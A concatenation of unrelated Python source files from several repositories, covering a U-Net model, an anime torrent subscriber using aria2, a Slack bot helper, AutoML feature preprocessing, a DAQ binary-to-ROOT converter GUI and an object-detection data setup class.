# more downsampling layers
if more_layers > 0:
self.more_downs = [
unetDown(features[4], features[4] if not self.concat_x else features[4] - n_input_channels,
norm_layer, need_bias, pad) for i in range(self.more_layers)]
self.more_ups = [
unetUp(features[4], upsample_model, need_bias, pad,
same_num_feat=True) for i in range(self.more_layers)]
self.more_downs = ListModule(*self.more_downs)
self.more_ups = ListModule(*self.more_ups)
self.up4 = unetUp(features[3], upsample_model, need_bias, pad)
self.up3 = unetUp(features[2], upsample_model, need_bias, pad)
self.up2 = unetUp(features[1], upsample_model, need_bias, pad)
self.up1 = unetUp(features[0], upsample_model, need_bias, pad)
self.upend = common.Upsampler(common.default_conv, scale, features[0], act=False)
resblock = [common.ResBlock(
common.default_conv, features[0], 3, act=nn.ReLU(True), bn=True, res_scale=1
) for _ in range(3)]
self.resblock = nn.Sequential(*resblock)
self.final = conv(features[0], n_output_channels, 1, bias=need_bias, pad=pad)
self.final = nn.Sequential(self.final, nn.Sigmoid())
def forward(self, inputs):
# DownSample
downs = [inputs]
down = nn.AvgPool2d(2, 2)
for i in range(4 + self.more_layers):
downs.append(down(downs[-1]))
in64 = self.start(inputs)
if self.concat_x:
in64 = torch.cat([in64, downs[0]], 1)
down1 = self.down1(in64)
if self.concat_x:
down1 = torch.cat([down1, downs[1]], 1)
down2 = self.down2(down1)
if self.concat_x:
down2 = torch.cat([down2, downs[2]], 1)
down3 = self.down3(down2)
if self.concat_x:
down3 = torch.cat([down3, downs[3]], 1)
down4 = self.down4(down3)
if self.concat_x:
down4 = torch.cat([down4, downs[4]], 1)
if self.more_layers > 0:
prevs = [down4]
for kk, d in enumerate(self.more_downs):
out = d(prevs[-1])
if self.concat_x:
out = torch.cat([out, downs[kk + 5]], 1)
prevs.append(out)
up_ = self.more_ups[-1](prevs[-1], prevs[-2])
for idx in range(self.more_layers - 1):
l = self.more_ups[self.more_layers - idx - 2]
up_ = l(up_, prevs[self.more_layers - idx - 2])
else:
up_ = down4
up4 = self.up4(up_, down3)
up3 = self.up3(up4, down2)
up2 = self.up2(up3, down1)
up1 = self.up1(up2, in64)
output = self.upend(up1)
output = self.resblock(output)
return self.final(output)
class unetConv2d(nn.Module):
def __init__(self, in_size, out_size, norm_layer, need_bias, pad):
super(unetConv2d, self).__init__()
if norm_layer is not None:
self.conv1 = nn.Sequential(
conv(in_size, out_size, 3, bias=need_bias, pad=pad),
norm_layer(out_size),
nn.ReLU()
)
self.conv2 = nn.Sequential(
conv(out_size, out_size, 3, bias=need_bias, pad=pad),
norm_layer(out_size),
nn.ReLU()
)
else:
self.conv1 = nn.Sequential(
conv(in_size, out_size, 3, bias=need_bias, pad=pad),
nn.ReLU()
)
self.conv2 = nn.Sequential(
conv(out_size, out_size, 3, bias=need_bias, pad=pad),
nn.ReLU()
)
def forward(self, inputs):
outputs = self.conv1(inputs)
outputs = self.conv2(outputs)
return outputs
class unetDown(nn.Module):
def __init__(self, in_size, out_size, norm_layer, need_bias, pad):
super(unetDown, self).__init__()
self.conv = unetConv2d(in_size, out_size, norm_layer, need_bias, pad)
self.down = nn.MaxPool2d(2, 2)
def forward(self, inputs):
outputs = self.down(inputs)
outputs = self.conv(outputs)
return outputs
class unetUp(nn.Module):
def __init__(self, out_size, upsample_model, need_bias, pad, same_num_feat=False):
super(unetUp, self).__init__()
n_feat = out_size if same_num_feat else out_size * 2
if upsample_model == 'deconv':
self.up = nn.ConvTranspose2d(n_feat, out_size, 4, stride=2, padding=1)
self.conv = unetConv2d(out_size * 2, out_size, None, need_bias, pad)
elif upsample_model == 'bilinear' or upsample_model == 'nearest':
self.up = nn.Sequential(nn.Upsample(scale_factor=2, mode=upsample_model),
conv(n_feat, out_size, 3, bias=need_bias, pad=pad))
self.conv = unetConv2d(out_size * 2, out_size, None, need_bias, pad)
else:
assert False
def forward(self, inputs1, inputs2):
in1_up = self.up(inputs1)
if (inputs2.size(2) != in1_up.size(2)) or (inputs2.size(3) != in1_up.size(3)):
diff2 = (inputs2.size(2) - in1_up.size(2)) // 2
diff3 = (inputs2.size(3) - in1_up.size(3)) // 2
inputs2_ = inputs2[:, :, diff2 : diff2 + in1_up.size(2), diff3 : diff3 + in1_up.size(3)]
else:
inputs2_ = inputs2
output = self.conv(torch.cat([in1_up, inputs2_], 1))
return output
``` |
{
"source": "jintaos2/Anime-Crawler",
"score": 2
} |
#### File: Anime-Crawler/live_update/subscribe.py
```python
import re
import os
import xmlrpc.client
import json
import logs
import traceback
class Subscribe:
"""rules
[{
"dir": "平稳世代的韦驮天们",
"title": [ "平稳世代的韦驮天们|Heion Sedai no Idaten", "動畫" ],
"title_optional": [ "简|CHS|GB", "简|CHS|GB|繁|CHT|BIG5", "1080|2160" ],
"epsode_filter": "[^a-zA-Z0-9](\\d\\d)[^a-zA-Z0-9]",
"order": 0,
"status": "active",
"epsodes": [ "12", "13" ]
}]
"""
def __init__(self, list_file:str, cache_dir:str, sources:list, aria2_url:str, aria2_dir:str):
self.list_file = list_file # './log/mylist.json'
self.cache_dir = cache_dir # './log/cache/'
self.sources = sources # ['dmhy','dmhy2']
self.aria2_url = aria2_url # "http://127.0.0.1:6800/rpc"
self.aria2_dir = aria2_dir # "E:/anime"
self.items = [] # new items
self.rules = [] # new rules
def download(self):
self.read_rules() # odd rules
self.read_history(10) # cached items
self.n_new = 0 # number of new mached items
for rule in self.rules:
curr_rule = Rule(rule)
results = {} # {epsode: [(score, link, dir, title), (score, link, dir, title)]}
for item in self.items: # [release_time, release_type, release_title, release_magnet,release_size]
epsode, score = curr_rule.match(item)
if epsode == -1: continue
if epsode not in results: results[epsode] = []
results[epsode].append((score, item[3], rule["dir"], item[2])) # item match!
for epsode, results_per_epsode in results.items(): # download per epsode
results_per_epsode.sort(key = lambda x: x[0], reverse=True)
idx = rule["order"]
idx = idx if idx < len(results_per_epsode) else -1
if self.download_item(results_per_epsode[idx]): # download by order
curr_rule.delete(epsode) # delete downloaded epsode
curr_rule.store() # restore epsode
logs.error_logger.info(f"[new] {self.n_new} items match the rule")
if self.n_new > 0:
logs.update_logger.info("----------------------------")
self.write_rules()
# (score, link, dir, title)
def download_item(self,item):
self.n_new += 1
_, link, subdir, title = item
logs.update_logger.info(f"[new] {title}")
try:
s = xmlrpc.client.ServerProxy(self.aria2_url)
id_ = s.aria2.addUri([link],{'dir': self.aria2_dir + subdir})
aria_status = s.aria2.tellStatus(id_)
logs.update_logger.info(f"[download] {title} dir:{aria_status['dir']}")
logs.error_logger.info(f"[download] {title} dir:{aria_status['dir']}")
return True
except Exception as e:
logs.error_logger.info(f"[aria2 error] port={self.aria2_url}, will try again]")
logs.error_logger.info(traceback.format_exc(limit=1))
return False
def read_rules(self):
try:
with open(self.list_file, 'r', encoding='utf8') as f:
self.rules = json.load(f)
except Exception as e:
logs.error_logger.info(f"[error] read_rules: {e}")
def write_rules(self):
try:
with open(self.list_file, 'w+', encoding='utf8') as f:
json.dump(self.rules, f, indent=2, ensure_ascii=False)
except Exception as e:
logs.error_logger.info(f"[error] write_rules: {e}")
def read_history(self, days:int):
filepaths: list = []
for name in self.sources:
cache = self.cache_dir + name + '/'
filepaths += [cache+i for i in sorted(os.listdir(cache), reverse=True) if len(i)==14][0:days]
self.items = []
for filepath in filepaths:
valid = []
with open(filepath, 'r', encoding='utf-8') as f:
lines = [i.split(',') for i in f.readlines() if i != '\n']
for i in lines:
if len(i) < 4: continue
if len(i) > 5: logs.error_logger.info(f'[read cache] unexpected items: {i}')
magnet = i[3]
if magnet[:8] == 'magnet:?': valid.append(i)
self.items += valid
return self.items
class Rule():
def __init__(self, rules:dict):
self.rules = rules
self.title_must = [re.compile(i, re.I) for i in rules["title"]] # ["进击的巨人|進擊的巨|Shingeki no Kyojin", "動畫"]
if "title_optional" not in rules:
self.title_optional = [ "简|CHS|GB", "1080|2160"]
else:
self.title_optional = rules["title_optional"]
self.title_optional = [re.compile(i, re.I) for i in self.title_optional]
self.epsode_filter = re.compile(r'[^a-zA-Z0-9](\d\d)[^a-zA-Z0-9]') # "[^a-zA-Z0-9](\\d\\d)[^a-zA-Z0-9]"
self.epsodes:set = self.epsode_str2int(rules["epsodes"] )
def epsode_str2int(self,a:list) -> set: # ["01", "02", "003-08"] -> [1,2,3,4,5,6,7,8]
ret: list = []
for i in a:
ii = i.split('-')
if len(ii) == 1:
ret.append(int(i))
elif len(ii) == 2:
ret += list(range(int(ii[0]),int(ii[1])+1))
return set(ret)
def epsode_int2str(self,a:set) -> list: # {1,2,3,5,6,7,8} -> ["01-03", "05-08"]
def subset(a:list) -> str:
'''pop int from a, reuturn str
'''
start = a.pop()
end = start
while end + 1 in a:
end = a.pop()
if start == end:
return str(end)
else:
return str(start) + '-' + str(end)
ret = []
a = list(a)
a.sort(reverse=True)
while a:
ret.append(subset(a))
return ret
def match(self, item: list):
"""
input: [release_time, release_type, release_title, release_magnet,release_size]
output:
epsode: -1 means no match
score
"""
title = item[1] + item[2]
for regex in self.title_must:
if not regex.search(title):
return -1, 0 # title not match
epsode_ = self.epsode_filter.findall(title)
if len(epsode_) > 0 and re.match(r'\d+', epsode_[-1]):
epsode = int(epsode_[-1])
if epsode not in self.epsodes:
return -1, 0 # epsode not match
else:
logs.error_logger.info(f"[error filter epsode] {title}")
return -1, 0
score = 0
for regex in self.title_optional:
if regex.search(title):
score += 1
return epsode, score
def delete(self, epsode:int):
self.epsodes.remove(epsode)
def store(self):
self.rules["epsodes"] = self.epsode_int2str(self.epsodes)
``` |
{
"source": "jinthagerman/bga_slack",
"score": 3
} |
#### File: bga_slack/src/bga_agricola.py
```python
import math
def is_harvest_round(progress):
progress_number = int(progress)
progress_per_round = 100/14
harvest_rounds = [4, 7, 9, 11, 13, 14]
for harvest_round in harvest_rounds:
abs_progress = progress_per_round * harvest_round
if math.floor(abs_progress) == progress_number or math.ceil(abs_progress) == progress_number:
return True
return False
```
#### File: bga_slack/src/utils.py
```python
from urllib.parse import urlparse
import re
import random
import logging
from logging.handlers import RotatingFileHandler
logging.getLogger("slack").setLevel(logging.WARN)
LOG_FILENAME = "errs"
logger = logging.getLogger(__name__)
handler = RotatingFileHandler(LOG_FILENAME, maxBytes=10000000, backupCount=0)
formatter = logging.Formatter("%(asctime)s | %(name)s | %(levelname)s | %(message)s")
handler.setFormatter(formatter)
logger.addHandler(handler)
logger.setLevel(logging.DEBUG)
# Via https://stackoverflow.com/questions/7160737/how-to-validate-a-url-in-python-malformed-or-not
def is_url(url):
try:
result = urlparse(url)
return all([result.scheme, result.netloc])
except ValueError:
return False
def saveListToFile(list, filename):
with open(filename, "w") as text_file:
for item in list:
text_file.write(item + '\n')
def readListFromFile(filename):
try:
with open(filename, "r") as text_file:
return text_file.read().splitlines()
except FileNotFoundError:
return []
def pickRandomMessage(ADDITIONAL_MESSAGES):
RANDOM_MESSAGES_FILENAME = "random_messages"
additional_messages = readListFromFile(RANDOM_MESSAGES_FILENAME)
logger.debug(f'{len(additional_messages)}" messages left in {RANDOM_MESSAGES_FILENAME}')
if len(additional_messages) == 0:
logger.debug(f'Repopulating {RANDOM_MESSAGES_FILENAME} with responses')
random.shuffle(ADDITIONAL_MESSAGES)
additional_messages = ADDITIONAL_MESSAGES
additional_message = additional_messages.pop(0)
saveListToFile(additional_messages, RANDOM_MESSAGES_FILENAME)
return additional_message
def reset_context(contexts, author):
"""End the current interactive session by deleting info about it."""
contexts[author] = {}
async def send_help(message, help_type):
"""Send the user a help message from a file"""
filename = "src/docs/" + help_type + "_msg.md"
with open(filename) as f:
text = f.read()
remainder = text.replace(4 * " ", "\t")
await send_message_partials(message.author, remainder)
async def send_message_partials(destination, remainder):
# Loop over text and send message parts from the remainder until remainder is no more
while len(remainder) > 0:
chars_per_msg = 2000
if len(remainder) < chars_per_msg:
chars_per_msg = len(remainder)
msg_part = remainder[:chars_per_msg]
remainder = remainder[chars_per_msg:]
# Only break on newline
if len(remainder) > 0:
while remainder[0] != "\n":
remainder = msg_part[-1] + remainder
msg_part = msg_part[:-1]
# Discord will delete whitespace before a message
# so preserve that whitespace by inserting a character
while remainder[0] == "\n":
remainder = remainder[1:]
if remainder[0] == "\t":
remainder = ". " + remainder[1:]
await destination.send(msg_part)
def normalize_name(game_name):
return re.sub("[^a-z0-7]+", "", game_name.lower())
def force_double_quotes(string):
# People from other countries keep on using strange quotes because of their phone's keyboard
# Force double quotes so shlex parses correctly
all_quotes = "'‹›«»‘’‚“”„′″「」﹁﹂『』﹃﹄《》〈〉"
return re.sub("[" + all_quotes + "]", '"', string)
``` |
{
"source": "JintingZhang/AUTOML",
"score": 3
} |
#### File: starting_kit/code_submission/preprocess.py
```python
import datetime
import pandas as pd
import numpy as np
from multiprocessing import Pool
import CONSTANT
from util import log, timeit
uni_ops = {
CONSTANT.TIME_PREFIX: {
'week': lambda df: df.dt.week,
'year': lambda df: df.dt.year,
'month': lambda df: df.dt.month,
'day': lambda df: df.dt.day,
'hour': lambda df: df.dt.hour,
# 'minute': lambda df: df.dt.minute,
'dayofweek': lambda df: df.dt.dayofweek,
'dayofyear': lambda df: df.dt.dayofyear,
},
}
@timeit
def compress_df(df, info, num=True, cat=True):
schema = info['schema']
if num:
num_cols = [col for col, types in schema.items() if types == 'num']
if len(num_cols) > 0:
df[num_cols] = df[num_cols].astype('float32')
if cat:
cat_cols = [col for col, types in schema.items() if types == 'str']
if len(cat_cols) > 0:
df[cat_cols] = df[cat_cols].astype('category')
@timeit
def parallelize_apply(func, df, cols):
num_threads=4
pool = Pool(processes=num_threads)
col_num = int(np.ceil(len(cols) / num_threads))
res1 = pool.apply_async(func, args=(df,cols[:col_num]))
res2 = pool.apply_async(func, args=(df,cols[col_num:2 * col_num]))
res3 = pool.apply_async(func, args=(df,cols[2 * col_num:3 * col_num]))
res4 = pool.apply_async(func, args=(df,cols[3 * col_num:]))
pool.close()
pool.join()
df = pd.concat([df,res1.get(),res2.get(),res3.get(),res4.get()],axis=1)
return df
@timeit
def normal_apply(func, df, cols):
return pd.concat([df, func(df, cols)], axis=1)
@timeit
def clean_tables(df,info):
schema = info['schema']
num_cols = [col for col, types in schema.items() if types == 'num']
# cat_cols = [c for c in df if c.startswith(CONSTANT.CATEGORY_PREFIX)]
m_cat_cols = [col for col, types in schema.items() if types == 'str']
time_cols = [col for col, types in schema.items() if types == 'timestamp']
fillna(df,info)
if len(m_cat_cols) > 3:
df = parallelize_apply(count_m_cat, df, m_cat_cols)
elif len(m_cat_cols) > 0:
df = normal_apply(count_m_cat, df, m_cat_cols)
if len(time_cols) > 0:
df = normal_apply(transform_datetime, df, time_cols)
# drop columns
df.drop(m_cat_cols+time_cols, axis=1, inplace=True)
#compress_df(df,info)
@timeit
def clean_df(df,info):
#compress_df(df,info, num=False)
#df_fillna_with_mean(df,info)
hash_cat(df,info)
return df
def get_dtype (df):
for col in df:
# get dtype for column
dt = df[col].dtype
return dt
@timeit
def fillna(df,info):
schema = info['schema']
#num_cols = [col for col, types in schema.items() if types == 'num']
# cat_cols = [c for c in df if c.startswith(CONSTANT.CATEGORY_PREFIX)]
m_cat_cols = [col for col, types in schema.items() if types == 'str']
time_cols = [col for col, types in schema.items() if types == 'timestamp']
#for c in [num_cols]:
# df[c].fillna(-1, inplace=True)
for c in [m_cat_cols]:
df[c].fillna("0", inplace=True)
for c in [time_cols]:
df[c].fillna(datetime.datetime(1970, 1, 1), inplace=True)
@timeit
def df_fillna_with_mean(df,info):
schema = info['schema']
#for c in [col for col, types in schema.items() if types == 'num']:
# df[c].fillna(df[c].mean(), inplace=True)
for c in [col for col, types in schema.items() if types == 'timestamp']:
mean = pd.to_timedelta(df[c]).mean() + pd.Timestamp(0)
df[c].fillna(mean, inplace=True)
for c in [col for col, types in schema.items() if types == 'str']:
df[c].fillna("0", inplace=True)
@timeit
def feature_engineer(df, config):
return df
def count_cat(df, cat_cols):
prefix_n = CONSTANT.NUMERICAL_PREFIX
prefix_c = CONSTANT.CATEGORY_PREFIX
op = "frequency"
new_df=pd.DataFrame()
for c in cat_cols:
dic = df[c].value_counts().to_dict()
new_df[f"{prefix_n}{op.upper()}({c})"] = df[c].apply(lambda x: dic[x])
return new_df
def hash_cat(df,info):
schema = info['schema']
for c in [col for col, types in schema.items() if types == 'str']:
df[c] = df[c].apply(lambda x: int(x))
def frequent_cat(x):
data = x.split(',')
item, freq = np.unique(data, return_counts=True)
return item[np.argmax(freq)]
def weighted_cat(dic):
def freq(x):
data = x.split(',')
item, freq = np.unique(data, return_counts=True)
global_freq = np.array([dic[i] for i in item])
return item[np.argmax(global_freq*freq)]
return freq
def count_m_cat(df,m_cat_cols):
prefix_n = CONSTANT.NUMERICAL_PREFIX
prefix_c = CONSTANT.CATEGORY_PREFIX
op_l = 'length'
op_f = 'frequent_cat'
op_fw = 'frequent_weighted_cat'
new_df=pd.DataFrame()
for c in m_cat_cols:
new_df[f"{prefix_c}{op_f.upper()}RANK(1)({c})"] = df[c].apply(frequent_cat)
new_df[f"{prefix_n}{op_l.upper()}({c})"] = df[c].apply(lambda x: len(x.split(',')))
all_item = ','.join(df[c].values).split(',')
item, freq = np.unique(all_item, return_counts=True)
dic = dict(zip(item, freq))
new_df[f"{prefix_c}{op_fw.upper()}RANK(1)({c})"] = df[c].apply(weighted_cat(dic))
return new_df
def transform_datetime(df, time_cols):
prefix_n = CONSTANT.NUMERICAL_PREFIX
ops = uni_ops[CONSTANT.TIME_PREFIX]
new_dfs = []
for c in time_cols:
new_df = df[c].agg(ops.values())
new_df.columns = [f"{prefix_n}{op.upper()}({c})" for op in ops]
new_dfs += [new_df]
return pd.concat(new_dfs, axis=1)
```
#### File: starting_kit/ingestion/common.py
```python
import logging
import importlib
import sys
class ModelApiError(Exception):
"""Model api error"""
def get_logger(verbosity_level, name, use_error_log=False):
"""Set logging format to something like:
2019-04-25 12:52:51,924 INFO score.py: <message>
"""
logger = logging.getLogger(name)
logging_level = getattr(logging, verbosity_level)
logger.setLevel(logging_level)
formatter = logging.Formatter(
fmt='%(asctime)s %(levelname)s %(filename)s: %(message)s')
stdout_handler = logging.StreamHandler(sys.stdout)
stdout_handler.setLevel(logging_level)
stdout_handler.setFormatter(formatter)
logger.addHandler(stdout_handler)
if use_error_log:
stderr_handler = logging.StreamHandler(sys.stderr)
stderr_handler.setLevel(logging.WARNING)
stderr_handler.setFormatter(formatter)
logger.addHandler(stderr_handler)
logger.propagate = False
return logger
VERBOSITY_LEVEL = 'INFO'
LOGGER = get_logger(VERBOSITY_LEVEL, __file__)
def _check_umodel_methed(umodel):
# Check if the model has methods `train`, `predict`, `save`, `load`.
for attr in ['train', 'update', 'predict', 'save', 'load']:
if not hasattr(umodel, attr):
raise ModelApiError("Your model object doesn't have the method ")
def import_umodel():
"""import user model"""
model_cls = importlib.import_module('model').Model
_check_umodel_methed(model_cls)
return model_cls
def init_usermodel(dataset):
"""initialize user model"""
return import_umodel()(
dataset.get_metadata(), dataset.get_test_timestamp(),
dataset.get_pred_timestamp())
``` |
{
"source": "jintonic/toward",
"score": 3
} |
#### File: jintonic/toward/b2r.py
```python
usage='''
Convert CAEN DAQ binary output file to ROOT format:
python3 b2r.py
'''
from tkinter import *
root=Tk(); root.resizable(0,0)
root.wm_title('Convert CAEN DAQ binary output to ROOT format (press q to quit)')
def quit_gui(event=None): root.quit(); root.destroy()
root.bind('q', quit_gui)
Label(root, text="Select run folder:").grid(column=0, row=0, sticky='nw')
rlist=Listbox(root, height=8,
# https://anzeljg.github.io/rin2/book2/2405/docs/tkinter/listbox.html
selectbackground='orchid', selectforeground='white',
# https://stackoverflow.com/a/48992537/1801749
exportselection=False)
rlist.grid(column=0, row=1, sticky='ew'); rlist.focus()
folders=[] # obtain a list of folders containing DAQ cfg files
from os import walk, system, path, listdir
for folder, subdirs, files in walk('.'):
if '.git' in subdirs: subdirs.remove('.git')
if 'share' in subdirs: subdirs.remove('share')
if 'WaveDumpConfig.txt' in files: folders.append(folder)
if 'settings.xml' in files: folders.append(folder)
folders.sort()
for folder in folders:
rlist.insert("end",folder)
if rlist.size()%2: rlist.itemconfig("end", bg='azure', fg='black')
rlist.selection_set(rlist.size()-1) # select the last run
rlist.see(rlist.size()-1) # scroll to the last run
Label(root, text="Select binary file:").grid(column=1, row=0, sticky='nw')
clist=Listbox(root,height=8,exportselection=False,
selectbackground='orchid',selectforeground='white')
clist.grid(column=1, row=1, sticky='ew')
Label(root, text="Existing ROOT files:").grid(column=2, row=0, sticky='nw')
flist=Listbox(root, height=8)
flist.grid(column=2, row=1, sticky='ew')
from subprocess import Popen
def call_show_py(event=None):
if rlist.size()==0 or flist.size()==0: return
run=rlist.get(rlist.curselection()[0]).replace('\\','/')
for folder, subdirs, files in walk(run):
if "RAW" in subdirs: run=run+"/RAW"
Popen(['python3', 'show.py', run])
show=Button(root, text='Show', command=call_show_py)
show.grid(column=2, row=2, sticky='se')
show.bind('<Return>', call_show_py)
root.bind('s', call_show_py)
def call_analyze_C(event=None):
if rlist.size()==0 or flist.size()==0: return
run=rlist.get(rlist.curselection()[0]).replace('\\','/')
for folder, subdirs, files in walk(run):
if "RAW" in subdirs: run=run+"/RAW"
Popen(['root', '-l', 'analyze.C("'+run+'")'])
ana=Button(root, text='Analyze', command=call_analyze_C)
ana.grid(column=2, row=2, sticky="sw")
ana.bind('<Return>', call_analyze_C)
root.bind('a', call_analyze_C)
Label(root, text="DAQ Configurations:").grid(column=0, row=2, sticky='sw')
text=Text(root, width=80, height=25)
text.grid(column=0, row=3, columnspan=3)
thr,polarity,nbase,ssize,bits=10,1,100,2,14
def parse_wavedump_cfg(run=''):
global thr, polarity, nbase, ssize, bits
with open(run+'/WaveDumpConfig.txt','r') as cfg:
for line in cfg:
if line=='': continue
if line[0]=='#': continue
part=line.split()
if len(part)==0: continue
if part[0]=='RECORD_LENGTH': nbase=int(int(part[1])*0.1)
if part[0]=='Threshold': thr=part[1]
if part[0]=='PULSE_POLARITY':
polarity=1 if part[1].lower()=='positive' else -1
if part[0]=='Digitizer':
if part[1]>'750': bits=10
elif part[1]>='740': bits=12
elif part[1]=='720': bits=12
else:
if part[1]=='721' or part[1]=='731': ssize=1
text.insert(INSERT,line)
import xml.etree.ElementTree as ET
def parse_compass_cfg(run=''):
tree = ET.parse(run+'/settings.xml'); cfg = tree.getroot()
daq = cfg.find('board').find('modelName').text
parameters = cfg.find('board').find('parameters')
global thr, polarity, nbase, ssize, bits
thr = parameters[8][1][0].text
polarity = 1 if parameters[4][1][0].text == 'POLARITY_POSITIVE' else -1
nbase = int(float(cfg.find('board').find('sampleTime').text)*0.1)
bits = cfg.find('board').find('adcBitCount').text
text.insert(INSERT,'digitizer: {}\nthreshold: {}\npolarity: {}'.format(
daq,thr,polarity))
def list_files_in(run=''):
clist.delete(0,'end'); flist.delete(0,'end')
for folders, subdirs, files in walk(run):
for file in files:
if file[-4:]==".dat": clist.insert("end",file) # WaveDump output
if file[-4:]==".bin": clist.insert("end",file) # CoMPASS output
if file[-4:]=="root": flist.insert("end",file)
if clist.size()%2: clist.itemconfig("end", bg='azure', fg='black')
clist.selection_set(0)
show['state']='normal' if flist.size()>0 else 'disabled'
ana['state']='normal' if flist.size()>0 else 'disabled'
def run_selected(event=None):
text.delete(1.0,'end')
run=rlist.get(rlist.curselection()[0])
for folder, subdirs, files in walk(run):
if 'WaveDumpConfig.txt' in files: parse_wavedump_cfg(run)
if 'settings.xml' in files: parse_compass_cfg(run)
list_files_in(run)
rlist.bind("<<ListboxSelect>>", run_selected)
run_selected()
def convert_file(event=None):
run=rlist.get(rlist.curselection()[0]).replace("\\","/")
file=clist.get(clist.curselection()[0])
ch=file[8:9] if file[-3:]=='bin' else file[4:5]
script='c2r.C' if file[-3:]=='bin' else 'w2r.C'
if file[-3:]=="bin": run=run+"/RAW"
argument='{}("{}","{}",{},{},{},{},{},{})'.format(
script,run,file,ch,thr,polarity,nbase,ssize,bits)
Popen(['root', '-b', '-q', argument]).wait()
list_files_in(run)
convert=Button(root, text='Convert', command=convert_file)
convert.grid(column=1,row=2)
convert.bind('<Return>', convert_file)
root.bind('c', convert_file)
# give focus to the GUI window in Mac
# https://stackoverflow.com/questions/17774859
from platform import system as platform
if platform() == 'Darwin': # How Mac OS X is identified by Python
system('''/usr/bin/osascript -e 'tell app "Finder" to set frontmost of process "Python" to true' ''')
# If you put root.destroy() here, it will cause an error if the window is
# closed with the window manager.
root.mainloop()
``` |
{
"source": "jintrone/advice-reification",
"score": 3
} |
#### File: py/classifier/prediction.py
```python
import pandas as pd
import numpy as np
from sklearn import linear_model
class predictInfo:
def __init__(self):
p_train = pd.read_csv('/Users/josh/Dropbox/@PAPERS/2017/CSCW/data/classification/provideinfo.csv', index_col = 0)
self.p_model = linear_model.LogisticRegression(class_weight={0:1, 1: 2}, penalty='l2')
self.p_model.fit(p_train.ix[:,0:-1], p_train.ix[:,-1])
del(p_train)
print("Learned provide info model")
r_train = pd.read_csv('/Users/josh/Dropbox/@PAPERS/2017/CSCW/data/classification/receivedinfo.csv', index_col = 0)
self.r_model = linear_model.LogisticRegression(class_weight={0:1, 1: 2}, penalty='l2')
self.r_model.fit(r_train.ix[:,0:-1], r_train.ix[:,-1])
del(r_train)
print("Learned receive info model")
def processCorpus(self,corpus):
print("Predict %s"%(corpus))
topredict = pd.read_csv('/Users/josh/Dropbox/@PAPERS/2017/CSCW/data/classification/%s.topredict.csv'%(corpus), index_col = 0)
p = self.p_model.predict(topredict)
r = self.r_model.predict(topredict)
out_p = pd.DataFrame(p,index=topredict.index.values, columns=['pi'])
out_r = pd.DataFrame(r,index=topredict.index.values, columns=['ri'])
final = out_p.join(out_r)
final.to_csv('/Users/josh/Dropbox/@PAPERS/2017/CSCW/data/classification/%s.labelled.csv'%(corpus))
def main():
corpora = ["anxiety_and_panic_disorders_exchange","bipolar_disorder_exchange","cancer_community","colorectal_cancer_exchange","depression_exchange","erectile_dysfunction_exchange","eye_health_community","food_and_cooking_exchange","gynecology_exchange","heart_disease_exchange","hypertension_and_high_blood_pressure_exchange","infertility_and_reproduction_exchange","knee_and_hip_replacement_exchange","lupus_exchange","mens_health_community","migraines_and_headaches_exchange","newborn_and_baby_exchange","oral_health_exchange","osteoarthritis_exchange","pet_health_exchange","pregnancy_exchange","prostate_cancer_exchange","raising_fit_kids_community","rheumatoid_arthritis_exchange","skin_and_beauty_exchange","skin_problems_and_treatments_exchange","sleep_disorders_exchange","smoking_cessation_exchange","sports_medicine_exchange","stroke_exchange","substance_abuse_exchange"]
p = predictInfo()
for corpus in corpora:
p.processCorpus(corpus)
if __name__ == "__main__":
main()
``` |
{
"source": "JintuZheng/Blog-",
"score": 3
} |
#### File: JintuZheng/Blog-/gradient.py
```python
from math import pi
import torch
import torch.optim
from debug import ptf_tensor, draw3D_func
# 示计算定点梯度
x=torch.tensor([pi/3,pi/6],requires_grad=True)
f = - ((x.cos() ** 2).sum()) ** 2
ptf_tensor(f)
f.backward() # 计算梯度
ptf_tensor(x.grad) # 点在【pi/3,pi/6】的梯度值
optimizer=torch.optim.SGD([x,],lr=0.1,momentum=0)
for step in range(20):
if step:
optimizer.zero_grad() #清空优化器上一次迭代产生的数据
f.backward() # 计算梯度
optimizer.step() #更新x[0],x[1]的值
f = - ((x.cos() ** 2).sum()) ** 2
print ('step {}: x = {}, f(x) = {}, grad = {}'.format(step, x.tolist(), f, x.grad))
# 示例: Himmelblau函数的优化
# 这是一个四个坑的函数,从不同的点出发可以收敛到不同位置的地方
def himmelblau(x):
return (x[0]**2+x[1]-11)**2+(x[0]+x[1]**2-7)**2
draw3D_func(himmelblau) # 绘制函数图像
x=torch.tensor([0.,0.],requires_grad=True)
optimizer=torch.optim.Adam([x,])
for step in range(20001):
if step:
optimizer.zero_grad()
f.backward() # f.backward() 找局部最小值,我们只需要利用相反(-f).backward()就能求局部最大值
optimizer.step()
f=himmelblau(x)
if step % 1000 ==0:
print ('step {}: x = {}, f(x) = {}, grad = {}'.format(step, x.tolist(), f, x.grad))
``` |
{
"source": "JintuZheng/zisan",
"score": 2
} |
#### File: zisan/ObjDetect/Interface.py
```python
import argparse
import time
import torch.distributed as dist
import torch.optim as optim
import torch.optim.lr_scheduler as lr_scheduler
from torch.utils.data import DataLoader
from .test import test # Import test.py to get mAP after each epoch
from .models import *
from .utils.datasets import *
from .utils.utils import *
from glob import glob
import os
import random
import xml.etree.ElementTree as ET
import pickle
import os
from os import listdir, getcwd
from os.path import join
import shutil
import cv2
import warnings
warnings.filterwarnings('ignore')
class ObjDetect_Preprocess(object):
def __init__(self,classnames=['REC'],currentpath='',datapath='data',xmlpath='Annotations',setspath='ImageSets',labelpath='labels',imgspath='images'):
self.sets = ['train', 'test', 'val']
self.datapath=currentpath+'/'+datapath
self.classes = classnames
self.xmlpath=self.datapath+'/'+xmlpath
self.setspath=self.datapath+'/'+setspath
self.labelspath=self.datapath+'/'+labelpath
self.imgspath=self.datapath+'/'+imgspath
self.makeDataLog()
self.makeTxt()
self.voc_label_make()
def makeDataLog(self):
names=open(self.datapath+'/classes.names','w')
for i,item in enumerate(self.classes):
names.write(item)
if i != (len(self.classes)-1):
names.write('\n')
#shapefile=open(self.datapath+'/pics.shapes','w')
globalconfig = open(self.datapath+'/global_config.data','w')
#ids=['classes=','train=','names=','backup=','eval=']
globalconfig.write('classes='+str(len(self.classes))+'\n')
globalconfig.write('train='+str(self.datapath+'/train.txt\n'))
globalconfig.write('valid='+str(self.datapath+'/test.txt\n'))
globalconfig.write('names='+self.datapath+'/classes.names\n')
globalconfig.write('eval=MYSET\n')
globalconfig.write('backup=backup')
def makeTxt(self):
trainval_percent = 0.1
train_percent = 0.9
xmlfilepath = self.xmlpath
txtsavepath = self.setspath
total_xml = os.listdir(xmlfilepath)
num = len(total_xml)
list = range(num)
